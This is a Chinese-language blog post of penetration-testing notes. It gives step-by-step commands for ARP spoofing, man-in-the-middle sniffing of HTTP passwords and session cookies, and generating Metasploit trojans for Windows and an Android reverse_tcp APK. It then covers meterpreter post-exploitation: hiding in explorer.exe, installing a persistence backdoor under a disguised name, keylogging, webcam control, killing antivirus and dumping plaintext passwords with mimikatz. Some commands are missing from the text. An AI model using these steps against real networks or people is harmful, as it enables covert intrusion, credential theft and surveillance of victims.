Web安全渗透
1. 局域網斷網攻擊
wins下
ipconfig查看主機網絡IP。
在vmware下
ifconfig獲取當前虛擬機網卡,可能是eth0
fping -asg 172.20.12.254/24獲取局域網網關中的所有主機,網關為172.20.12.254
arpspoof -i eth0(網卡) -t 192.168.1.10(目標主機的IP) 192.168.1.1(目標主機所在的網關)arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙這樣就可以使得Ip為192.168.1.10,網關為192.168.1.1,無法連網。
原理:流量劫持
正常上網:上網—》網關—》外網
上網—》劫持機的網卡(所有的流量都經過我)—》不轉發到外網,導致斷網
2. 流量劫持,并轉發到外網,這樣可查看所有會話,中間人攻擊
echo 1 >/proc/sys/net/ipv4/ip_forward #流量轉發 arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙工具:arpspoof –>流量欺騙
ctrl + shift + t,新打開一個終端,輸入
可以查看圖經過網卡所有的圖片信息,這樣就能查看 IP192.168.1.10所瀏覽的圖片,但其仍然可以上網。
3. http賬號密碼獲取
首先流量欺騙,
echo 1 >/proc/sys/net/ipv4/ip_forward #流量轉發 arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙其次,抓包。
ctrl + shift + t,新打開一個終端,輸入
工具:ettercap抓取網絡當中傳送的數據包,-T代表文本模式,q代表安靜模式。
這樣就可以捕獲到 IP192.168.1.10登陸到的所有http網頁下的賬號和密碼。
4.局域網內Session會話劫持
Session,通俗的講,瀏覽器 打開–》關閉這個期間是一個會話。
在同一個局域網當中,登錄別人的百度貼吧等。
首先,流量轉發,流量欺騙
echo 1 >/proc/sys/net/ipv4/ip_forward #流量轉發 arpspoof -i eth0 -t 192.168.1.10 192.168.1.1#流量欺騙其次,捕獲數據
ctrl + shift + t,新打開一個終端,輸入
tcpdump -i eth0 -w test.cap用來捕獲數據。w寫入,tcpdump抓去打到本地的數據包。
最后,解析數據
ctrl + shift + t,新打開一個終端,輸入
ferret -r test.cap下面需要設置瀏覽器的代理
Edit—》Preferences—》Advanced—>Network—>Connection—>Settings—>Manual proxy configuration
接著進入下一步,模擬受害者登陸
ctrl + shift + t,新打開一個終端,輸入
再接著進入瀏覽器,輸入 127.0.0.1:1234
就可以看到所有的cookies
點擊cookies就可以模擬受害者登陸。
工具:用到的工具是arpspoof tcpdump ferret hamster。
arpspoof 進行ARP欺騙 tcpdump抓去打到本地的數據包 Ferret用來處理抓下來的數據包的 Hamster跟ferret配合使用,提供一個web服務來讓我們交互控制。整個流程可見
開始arp欺騙 命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100 捕獲數據包 命令:tcpdump -i eth0 -w cookie.cap 模擬受害者登錄 受害者在受害機器上就隨便刷新一下或者登錄一下 完畢下面我們開始重點 處理抓去的數據包ferret -r cookie.cap 自動生成了 hamster.txt 記得設置瀏覽器代理: 開啟hamster服務 打開hamster 瀏覽器輸入http://127.0.0.1:12345.生成木門
攻擊端:
OS:Kali
IP:192.168.1.104
被害端:
OS:Windows (64位)
IP:192.168.1.10
metaspolit framework
msf利器!
如何生成木門
LHOST 為虛擬機的IP,LPORT為虛擬機的端口,我們是用虛擬機作為攻擊機。
ctrl + shift +t , 重新打開一個端口
輸入
下面開始尋找肉機,只要別人打開這個muma.exe,就會成功找到。
別人必須打開這個 .exe 文件?如何讓別人打開?360 直接就能屏蔽?
監聽鍵盤,輸入的是漢語,監聽輸出的是英文,這是以為監聽鍵盤僅僅只是監聽鍵盤的輸入字符。
幫助菜單
meterpreter > ?轉移 meterpreter到其他進程
(轉移的目的是為了防止被攻擊人查看進程管理器,殺死不明進程,一般轉移到屏幕桌面進程explorer.exe,只要屏幕不關閉,metersploit進程就不關閉)
將木馬文件test.exe 的進程pid遷移到 PID為2044的explorer的進程
meterpreter > migrate 2044驗證
meterpreter > ps查看可知,test.exe進程已經沒有了。需要注意的是如果存在殺軟的話可能會阻止進程注入
安裝后門 metsvc
(安裝后門的目的是為了進行開機自啟動,修改注冊表之類的,讓木馬能長久的存活,一般把木馬test.exe 文件 改成qqconfig.exe之類的偽裝名,肉機就不敢刪除。)
metsvc后門安裝成功,接下來是連接
ctrl + shift +t , 重新打開一個端口
其中 RHOST 為肉機的IP, 端口設置為metsvc所創建的端口
查看肉機的系統
meterpreter > sysinfo獲取作為運行服務器的用戶
getuid盡可能獲取盡可能多的特權
getprivs獲得系統管理員權限
getsystem獲取目標主機的圖形界面(VNC)
meterpreter > run vnc查看屏幕
meterpreter > keyscan_start #啟動時與如 Word 或瀏覽器的進程相關聯的鍵盤記錄軟件 meterpreter > keyscan_dump #鍵盤記錄軟件的內容轉儲 meterpreter >keyscan_stop #停止鍵盤記錄軟件抓去 meterpreter 桌面的屏幕截圖
screenshot控制攝像頭
meterpreter > webcam_stream控制鼠標
uictl -啟用用戶界面組件的一些控件
查看當前進程
ps重新打開連接
meterpreter > rerun查看目標主機都采用了那些防護措施,列出幫助菜單,關閉防火墻以及其它我們發現的防護措施:
meterpreter >run getcountermeasure meterpreter >run getcountermeasuer -h meterpreter >run getcountermeasuer -d -kkillav腳本來殺死目標主機運行的殺毒軟件
meterpreter > run killav識別被控制的主機是否是一臺虛擬機
meterpreter >run checkvm在一個meterpreter會話界面中使用cmd shell
meterpreter >shell獲取密碼
法國神器mimikatz可以直接獲得操作系統的明文密碼,meterpreter添加了這個模塊。
首先加載mimikatz模塊。
由于我的Windows 2008是64位的,所以先要轉移到64位進程。
pid 2780 為64位進程 winlogon.exe
meterpreter > load mimikatz獲取密碼哈希
meterpreter > msv獲取明文密碼
meterpreter > kerberos參考主頁
https://www.91ri.org/8625.html
https://www.91ri.org/9018.html
待學習的網頁
https://www.91ri.org/8879.html
https://www.91ri.org/9548.html
https://www.91ri.org/9560.html
https://www.91ri.org/11060.html
https://www.91ri.org/7170.html
https://www.91ri.org/12488.html
https://www.91ri.org/6843.html
6.滲透安卓 Android
生成木馬
msfvenom -p android/meterpreter/reverse_tcp LHOST=虛擬機IP LPORT= 55555 R > test.apkctrl + shift + t 打開另外一個終端
msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 虛擬機IP set LPORT 55555 exploit更多細節可查看
http://www.myexception.cn/android/2023190.html
7.繼續
總結
- 上一篇: 民生银行值得办的白金卡 盘点民生的“神卡
- 下一篇: 农行信用币额度能调平吗?用这招曲线提额